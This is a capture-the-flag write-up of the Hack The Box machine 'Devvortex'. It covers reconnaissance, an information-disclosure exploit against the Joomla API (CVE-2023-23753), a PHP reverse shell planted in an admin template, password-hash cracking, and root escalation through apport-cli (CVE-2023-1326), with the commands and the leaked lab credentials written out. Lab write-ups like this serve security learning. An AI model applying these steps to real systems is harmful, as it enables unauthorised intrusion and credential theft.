Post

Devvortex - HTB Writeup

Posted Updated
By iamroot101 6 min read

Machine Info

Devvortex was an easy level Linux machine, involves exploiting CVE-2023-23753 for initial access and CVE-2023-1326 for Privilege Escalation

Pasted image 20240427223821

User

Scanning through Nmap

First of all we will go with nmap to scan the whole network and check for services running on the network. To scan the whole network and find all the open ports i use -p- used to scan the whole 65535 ports with –min-rate 10000 to scan network faster from nmap and i found a list of open ports on the network and get only the open ports using different terminal tools like cut, tr etc.

1
2

$ nmap -p- --min-rate 10000 10.129.229.146 -oN ini.txt && cat ini.txt | cut  -d ' ' -f1 | tr -d '/tcp' | tr '\n' ','
22,80

Now Let’s run the depth scan on these specific ports using:

1

$ nmap -p22,80 -sC -sV -A -T4 10.129.229.146 -oN scan.txt
  • -sC is to run all the default scripts
  • -sV for service and version detection
  • -A to check all default things
  • -T4 for aggressive scan
  • -oN to write the result into a specified file
1
2
3
4
5
6
7
8
9
10

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://devvortex.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Information Gathering

We have only two ports open, 80 HTTP and 22 SSH. From SSH version we can identify that Linux system is running on the target machine. On port 80 http, nginx 1.18.0 is running, which is not vulnerable at the time of writing this writeup. Nmap also reveals that we are being redirected to devvortex.htb while accessing the website. Let’s add it to our local DNS file located at /etc/hosts, so that our browser can resolve it.

1

$ echo "10.129.229.146  devvortex.htb" | sudo tee -a /etc/hosts

Web Testing

There is a web development software house website that is running on port 80. They offer services in web development.

Pasted image 20240427182944

Tech Stack

Server nginx/1.18.0 is running on Ubuntu, nothing something special.

1
2
3
4
5

HTTP/1.1 304 Not Modified
Server: nginx/1.18.0 (Ubuntu)
Last-Modified: Tue, 12 Sep 2023 17:45:54 GMT
Connection: close
ETag: "6500a3d2-4680"

I also tried to look for directories, but nothing special came out. After That i decided to look for subdomains, if i can find some. I use tool ffuf, you can also use different tools for this like, wfuzz, gobuster etc with the worlist /seclists/Discovery/DNS/subdomains-top1million-110000.txt from seclists.

1
2
3

$ ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://devvortex.htb/ -H "Host: FUZZ.devvortex.htb" -mc 200 -s
# Output
dev
  • -w for wordlist
  • -u for url
  • -H for Host header
  • -mc for match response code
  • -s for silent mode, not to print banner and status

From ffuf, we discover a subdomain called dev. Lets add this also to our local DNS file called hosts located in /etc in Linux.

1

$ sudo sed -i 's/\devvortex.htb\b/dev.devvortex.htb &/' /etc/hosts

Same some kind of software company website is running.

Pasted image 20240427191421

Let’s do some directory busting on this subdomain. We will using ffuf tool here because of it’s robustness and fast response time.

1

$ ffuf -u http://dev.devvortex.htb -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -mc 200,301 -s
  • -u for url
  • -w for wordlist
  • -mc to print only specified status code
  • -s for silent mode, not to print banner

Ffuf found some directory paths for us.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

images
media
language
plugins
tmp
cache
includes
templates
modules
components
administrator
libraries
api
home
layouts

Administrator path looks interesting there. After checking the administrator path, we discover that there is a joomla login page is running.

Pasted image 20240427192750

Joomla is an open source Content Management System (CMS), which is used to build websites and online applications. It is free and extendable which is separated into front-end and back-end templates (administrator)

Let’s fire a joomscan to find to joomla version to check if there is a vulnerable joomla running. Joomscan discover that, there is a Joomla 4.2.6 running on the target server.

1

$ joomscan -u http://dev.devvortex.htb

Pasted image 20240427193200

A quick google search reveals that the Joomla version 4.2.6 is vulnerable ot CVE-2023-23753 Unauthenticated Information Disclosure.

Pasted image 20240427193434

A great article explaining the whole vulnerability and it’s potential exploits can be found here. We will be using curl -v http://dev.devvortex.htb/api/index.php/v1/users?public=true to leak the usernames.

1
2

lewis@devvortex.htb
logan@devvortex.htb

Pasted image 20240427194154

To leak the database cred’s, we will be using curl -v http://10.9.49.205/api/index.php/v1/config/application?public=true

1

lewis : P4ntherg0t1n5r3c0n##

Pasted image 20240427194603

The database password is being used by lewis user who administrator on the CPanel. Let’s add a php reverseshell on the administrator templates to gain initial foothold on the box

Pasted image 20240427195500

After loading the error.php file we immediately get a shell on the box as a www-data.

Pasted image 20240427195549

Through /etc/passwd file, we discover that, there is only two valid users on the box. And we don’t have rights to see the content of either of these users’

1
2

logan
root

Pasted image 20240427195839

We discovered that the port 3306 (mysql) is running locally using

1

$ ss -lntp
  • -l for list the listening ports
  • -n for numeric port number, not the service name
  • -t to list the tcp ports
  • -p to list the processes

Pasted image 20240427200323

Let’s use the database (mysql) credentials we found using joomal CVE here to dump the database. Because the database port was not discovered

1

lewis : P4ntherg0t1n5r3c0n##

1

$ mysql -h localhost

Pasted image 20240427215951

There are bunch of tables present in joomla database. The most interesting one is sd4fg_users. Let’s dump it and see what’s inside it.

Pasted image 20240427220108

There is password hashes stored of both lewis and logan user. Let’s save them in a file and crack them using hashcat.

1
2

lewis : $2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u
logan : $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12

1
2
3

$ hashcat -m 3200 hash /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt

$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12:tequieromucho

Shell as Logan

Now we have both username and password. Lets gain a shell using SSH on the target system

1

$ sshpass -p tequieromucho  logan@devvortex.htb

Pasted image 20240427220600

Privilege Escalation

Using sudo -l we found that the user logan can run apport-cli on the behalf of root user on the box. The version of apport-cli is 2.20.11

Pasted image 20240427220832

A quick google search reveals the Local privilege Escalation in apport-cli 2.20.11 CVE-2023-1326 . here

Pasted image 20240427221158

According to the PoC, If a system is specially configured to allow unprivileged users to run sudo apport-cli, less is configured as the pager, and the terminal size can be set: a local attacker can escalate privilege

Exploitation

Let’s first create a crash file and the give it’s path and select v to make our exploit work.

1
2
3

$ sleep 60 &
$ kill -SIGSEGV  2717
$ sudo apport-cli -c /var/crash/_usr_bin_sleep.1000.crash

Pasted image 20240427223243

After when you see the screen like below image press ! and then enter. You will get a shell as a root on the box.

Pasted image 20240427223521

Pasted image 20240427223547

Happy Hacking ❤

ctf, linux, easy
htb linux ctf easy
This post is licensed under CC BY 4.0 by the author.